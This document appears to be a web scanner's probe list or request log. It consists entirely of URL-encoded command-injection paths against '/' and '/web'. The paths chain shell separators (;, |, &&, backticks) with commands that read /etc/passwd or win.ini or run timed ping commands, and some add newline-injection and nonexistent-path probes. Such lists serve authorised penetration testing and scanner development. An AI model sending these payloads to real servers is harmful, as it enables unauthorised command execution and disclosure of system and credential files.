/
/%20%252fbin%252fcat%20%252fetc%252fpasswd
/%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/%20%60ping%20-c%206%20localhost%60
/%20%60ping%20-c%206%20localhost%60/
/%20ping%20-c%206%20localhost
/%20ping%20-c%206%20localhost/
/%20ping%20-n%206%20localhost
/%20ping%20-n%206%20localhost/
/%20run%20ping%20-n%206%20localhost
/%20run%20ping%20-n%206%20localhost/
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%20type%20%25SYSTEMROOT%25%5cwin.ini
/%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%26%26%20ping%20-c%206%20localhost
/%26%26%20ping%20-c%206%20localhost/
/%26%26%20ping%20-n%206%20localhost
/%26%26%20ping%20-n%206%20localhost/
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%3b%20ping%20-c%206%20localhost
/%3b%20ping%20-c%206%20localhost/
/%3b%20ping%20-n%206%20localhost
/%3b%20ping%20-n%206%20localhost/
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%7c%20ping%20-c%206%20localhost
/%7c%20ping%20-c%206%20localhost/
/%7c%20ping%20-n%206%20localhost
/%7c%20ping%20-n%206%20localhost/
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_cccccccccc
/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a
/should_not_xist_llllllllllll
/web
/web%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/web%20%60ping%20-c%206%20localhost%60
/web%20%60ping%20-c%206%20localhost%60/
/web%20ping%20-c%206%20localhost
/web%20ping%20-c%206%20localhost/
/web%20ping%20-n%206%20localhost
/web%20ping%20-n%206%20localhost/
/web%20run%20ping%20-n%206%20localhost
/web%20run%20ping%20-n%206%20localhost/
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%26%26%20ping%20-c%206%20localhost
/web%26%26%20ping%20-c%206%20localhost/
/web%26%26%20ping%20-n%206%20localhost
/web%26%26%20ping%20-n%206%20localhost/
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%3b%20ping%20-c%206%20localhost
/web%3b%20ping%20-c%206%20localhost/
/web%3b%20ping%20-n%206%20localhost
/web%3b%20ping%20-n%206%20localhost/
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%7c%20ping%20-c%206%20localhost
/web%7c%20ping%20-c%206%20localhost/
/web%7c%20ping%20-n%206%20localhost
/web%7c%20ping%20-n%206%20localhost/
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web/
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_ooooooooooooo
/web/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a
/web/should_not_xist_jjjjjjjjjjjj
